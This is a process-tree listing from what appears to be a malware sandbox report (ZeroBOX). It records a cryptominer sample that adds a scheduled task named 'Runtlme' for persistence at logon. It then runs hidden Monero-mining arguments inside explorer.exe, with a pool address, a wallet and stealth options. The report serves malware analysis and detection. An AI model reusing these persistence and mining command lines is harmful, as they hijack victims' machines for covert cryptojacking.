| ZeroBOX

ZXCXZCsssssssssssASDFasdfEWSDFew.exe "C:\Users\test22\AppData\Local\Temp\ZXCXZCsssssssssssASDFasdfEWSDFew.exe"
1908
- xmr.exe "C:\Users\test22\AppData\Local\Temp\xmr.exe"
  1976
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Runtlme" /tr '"C:\Users\test22\AppData\Local\Temp\Runtlme.exe"' & exit
    2832
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Runtlme" /tr '"C:\Users\test22\AppData\Local\Temp\Runtlme.exe"'
      2740
  - Runtlme.exe "C:\Users\test22\AppData\Local\Temp\Runtlme.exe"
    2260
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Runtlme" /tr '"C:\Users\test22\AppData\Local\Temp\Runtlme.exe"' & exit
      2552
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Runtlme" /tr '"C:\Users\test22\AppData\Local\Temp\Runtlme.exe"'
        2112
    - sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      1120
    - explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.2miners.com:12222 --user=49hcP786scM9nuVkefkNyFQ4arucjrM6U741zcbsVDUL9TTmmcLG57t9HG1QwKU7X95HYv3LWPP37GoHtmUY8THJHxfZxTs --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=100 --tls --cinit-stealth
      2972

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents